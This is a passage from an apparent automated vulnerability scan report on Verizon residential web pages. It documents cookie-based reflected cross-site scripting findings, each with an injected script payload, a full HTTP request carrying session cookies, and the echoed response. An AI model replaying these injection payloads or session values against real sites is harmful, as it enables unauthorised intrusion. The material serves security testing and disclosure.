Cookie: Source=CHSI; vzapps=STATE=TXc1b7b<script>alert(1)</script>28eee026df0; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63717
Expires: Sat, 20 Nov 2010 00:12:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:26 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXc1b7b<script>alert(1)</script>28eee026df0; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Internet | Wi-Fi
</title><meta name="keywords" content="verizon internet services, verizon internet products, verizon wi-fi, ISP, internet
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXC1B7B<SCRIPT>ALERT(1)</SCRIPT>28EEE026DF0 </DIV>
...[SNIP]...

1.134. http://www22.verizon.com/Residential/WiFi/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/WiFi/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 63a3c'><script>alert(1)</script>03a48b9a52e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/WiFi/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX63a3c'><script>alert(1)</script>03a48b9a52e; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63721
Expires: Sat, 20 Nov 2010 00:12:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:11 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX63a3c'><script>alert(1)</script>03a48b9a52e; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Internet | Wi-Fi
</title><meta name="keywords" content="verizon internet services, verizon internet products, verizon wi-fi, ISP, internet
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX63A3C'><SCRIPT>ALERT(1)</SCRIPT>03A48B9A52E ' />
...[SNIP]...

1.135. http://www22.verizon.com/Residential/WiFi/HowToGetIt [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/WiFi/HowToGetIt

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 5782f<script>alert(1)</script>042ef7a5b1d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/WiFi/HowToGetIt HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX5782f<script>alert(1)</script>042ef7a5b1d; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 65807
Expires: Sat, 20 Nov 2010 00:11:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:42 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX5782f<script>alert(1)</script>042ef7a5b1d; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Internet | Wi-Fi: How to Get It
</title><meta name="keywords" content="verizon internet services, verizon internet products, verizon wi-fi
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX5782F<SCRIPT>ALERT(1)</SCRIPT>042EF7A5B1D </DIV>
...[SNIP]...

1.136. http://www22.verizon.com/Residential/WiFi/HowToGetIt [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/WiFi/HowToGetIt

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9067c'><script>alert(1)</script>8e4bfe5a6f4 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/WiFi/HowToGetIt HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX9067c'><script>alert(1)</script>8e4bfe5a6f4; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 65811
Expires: Sat, 20 Nov 2010 00:11:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:37 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX9067c'><script>alert(1)</script>8e4bfe5a6f4; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Internet | Wi-Fi: How to Get It
</title><meta name="keywords" content="verizon internet services, verizon internet products, verizon wi-fi
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX9067C'><SCRIPT>ALERT(1)</SCRIPT>8E4BFE5A6F4 ' />
...[SNIP]...

1.137. http://www22.verizon.com/Residential/aboutFiOS/ [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 7a661<script>alert(1)</script>d9779cddc35 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX7a661<script>alert(1)</script>d9779cddc35; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70879
Expires: Sat, 20 Nov 2010 03:23:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:23:30 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:23:30 GMT; path=/
Set-Cookie: ContextInfo_State=TX7a661<script>alert(1)</script>d9779cddc35; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:23:30 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:23:30 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:23:30 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX7A661<SCRIPT>ALERT(1)</SCRIPT>D9779CDDC35 </DIV>
...[SNIP]...

1.138. http://www22.verizon.com/Residential/aboutFiOS/ [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3c66b'><script>alert(1)</script>349281a9b34 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX3c66b'><script>alert(1)</script>349281a9b34; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69341
Expires: Sat, 20 Nov 2010 03:23:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:23:23 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:23:23 GMT; path=/
Set-Cookie: ContextInfo_State=TX3c66b'><script>alert(1)</script>349281a9b34; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:23:23 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:23:23 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:23:23 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX3C66B'><SCRIPT>ALERT(1)</SCRIPT>349281A9B34 ' />
...[SNIP]...

1.139. http://www22.verizon.com/Residential/aboutFiOS/ [dotcomsid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e344"-alert(1)-"44c032e99f0 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Residential/aboutFiOS/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=9e344"-alert(1)-"44c032e99f0; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76416
Expires: Sat, 20 Nov 2010 03:23:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:23:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:23:16 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:23:16 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:23:16 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:23:16 GMT; path=/

